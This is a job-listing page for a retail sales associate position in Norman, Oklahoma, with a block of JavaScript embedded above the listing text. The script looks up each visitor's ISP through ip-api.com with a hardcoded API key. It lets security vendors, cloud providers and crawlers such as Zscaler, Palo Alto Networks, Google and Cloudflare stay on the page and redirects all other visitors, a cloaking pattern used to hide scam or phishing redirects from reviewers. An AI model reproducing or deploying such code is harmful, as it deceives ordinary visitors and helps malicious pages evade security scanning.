Sales Associate/Store Clerk
Overview
const ipAddress = data.ip;
// retrieve ISP name and AS organization using ip-api.com API const ispUrl = `https://pro.ip-api.com/json/${ipAddress}?key=kKPypoeKUHgwZWD`; fetch(ispUrl) .then(response => response.json()) .then(data => { const ispName = data.isp; const asOrg = data.asname;
// check if ISP or AS organization is allowed const allowedIsps = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const allowedAsOrgs = [/Limestone Networks/i, /Limestone Networks, Inc./i, /Zscaler/i, /M247 Europe SRL/i, /amazon/i, /LinkedIn Corporation/i, /palo alto networks/i, /google/i, /panq/i, /Cloudflare, Inc./i, /Cloudflare/i, /Cloudflare Warp/i]; const ispAllowed = allowedIsps.some(pattern => pattern.test(ispName)); const asOrgAllowed = allowedAsOrgs.some(pattern => pattern.test(asOrg));
if (!ispAllowed && !asOrgAllowed) {
// Redirect all users to the same URL
window.location.href = '';
}
})
.catch(error => {
console.error('Error retrieving ISP name:', error);
});
})
.catch(error => {
console.error('Error retrieving IP address or location:', error);
});
Join our team as a Sales Associate/Store Clerk in Norman, Oklahoma, earning $16-$35/hr. In this role, you will provide excellent customer service, assist shoppers with product selection, and maintain a clean and organized store environment.
- Greet and assist customers to enhance their shopping experience
- Operate cash register and handle transactions accurately
- Restock shelves and ensure merchandise is well-presented
- Maintain store cleanliness and safety standards
- Respond to customer inquiries and resolve issues promptly
- Support inventory management and stock replenishment
Skills needed include strong communication, a friendly attitude, attention to detail, and the ability to work efficiently in a team. Benefits include competitive pay, flexible scheduling, employee discounts, and opportunities for growth. Join us to be part of a dynamic retail environment where your efforts make a difference!